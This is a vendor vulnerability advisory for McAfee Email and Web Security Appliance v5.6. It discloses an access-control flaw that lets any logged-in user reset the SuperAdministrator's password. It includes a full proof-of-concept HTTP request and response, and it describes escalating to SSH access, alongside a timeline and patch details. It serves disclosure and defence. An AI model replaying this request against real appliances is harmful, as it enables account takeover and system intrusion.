Summary
Name: McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
Release Date: 30 November 2012
Reference: NGS00155
Discoverer: Ben Williams
Vendor: McAfee
Vendor Reference:
Systems Affected:
Risk: High
Status: Published
TimeLine
Discovered: 7 November 2011
Released: 29 November 2011
Approved: 29 November 2011
Reported: 4 December 2011
Fixed: 13 March 2012
Published: 30 November 2012
Description
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
McAfee Email and Web Security Appliance v5.6 (v5.6 1741.115) is prone to
various access control flaws meaning that any logged-in administrator can
bypass controls to reset passwords of other administrators
The exploit would enable an attacker to:
– Having gained access to the UI (as any user level) an attacker can reset
the password of any user, including the “SuperAdministrator”
– Having reset the SuperAdministrator password, this will enable an
attacker to enable SSH and login to the appliance operating system
Technical Details
I. VULNERABILITY
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
II. BACKGROUND
McAfee (Owned by Intel) is one of the worlds best known providers of IT
security products.
The McAfee Email and Web Security Appliance provides security for Email and
Web protocols, and acts as a Firewall and Gateway solution.
III. DESCRIPTION
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can
bypass controls to reset passwords of other administrators
IV. PROOF OF CONCEPT
Although the product does implement basic role-based access control, this
is not enforced properly (only enforced by the visible menu system).
This means that (having gained access to the UI) an attacker can perform a
function they choose, even if it is outside the scope of the current role.
An example of this is in resetting other users passwords:
Any logged-in administrator can bypass controls to reset passwords of other
administrators. This includes resetting the password of the Super
Administrator password (without knowning an existing password)
This password change can be made by any user with an authenticated session
by making the following request with their session token.
Request:
POST /scmadmin/19320/cgi-bin/rpc/resetPassword/42 HTTP/1.1
Host: 192.168.233.40
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:7.0.1)
Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Content-Type: text/plain; charset=UTF-8
Referer: https://192.168.233.40/scmadmin/19320/en_US/html/index.html
Content-Length: 58
Cookie:
SCMUserSettings=%3Dnull%26popcheck%3D1%26lang%3Den_US%26lastUser%3Dscmadmin%26last_page_id%3Dsystem_groups;
SHOW_BANNER_NOTICE=BannerShown%3D1;
ws_session=SID%3DSID%3AD3207A76-061D-4280-8A2E-8CA7FA712BB8
Pragma: no-cache
Cache-Control: no-cache
{“adminName”:”System Administrator”,”userName”:”scmadmin”}
Reponse:
HTTP/1.1 200 OK
Date: Mon, 07 Nov 2011 10:59:48 GMT
Server: Apache/2.0.63 (Unix)
Vary: Accept-Encoding
Content-Length: 75
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=utf-8
[{“errorCode”:”0″,”jobId”:”42″},{“password”:”MXVT”,”userName”:”scmadmin”}]
This new “scmadmin” password can then be used to log into the UI as the
Super Administrator, and – enable SSH, and then also login to the operating
system as “support” via SSH (with the same password)
Fix Information
If role-based access control is implemented, it should be enforced
(otherwise it can be trivially bypassed).
Update to Email and Web Security 5.5 Patch 6, Email and Web Security 5.6
Patch 3, McAfee Email Gateway 7.0 Patch 1
